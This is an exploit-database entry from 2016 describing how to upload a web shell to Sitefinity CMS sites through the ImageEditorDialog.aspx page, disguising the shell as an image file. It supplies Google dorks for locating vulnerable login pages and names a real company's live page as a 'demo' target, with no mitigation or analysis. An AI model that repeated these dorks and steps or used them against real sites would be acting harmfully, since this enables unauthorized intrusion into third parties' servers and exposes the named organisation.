Sitefinity is a modern ASP.NET Web CMS , shell uploadin

Published
Credit
Risk
2016.10.26
iran anonymous
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: inurl:”Sitefinity: Login.aspx”

# Exploit Title: [upload shell in sites Sitefinity]
# Google Dork:
1 :[inurl:”Sitefinity: Login.aspx”]
2 :[inurl:”Sitefinity”]
# Date: [Tuesday, Mehr 27, 1395 AP]
# Exploit Author: [IRanonymous]
# site: [www.anonymous-team.com]


#exploit
1: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx


2: target.com/sitefinity/login.aspx

#demo
http://www.eastnets.com/Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx

upload shell .jpg, .jpeg, .gif, .png.


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com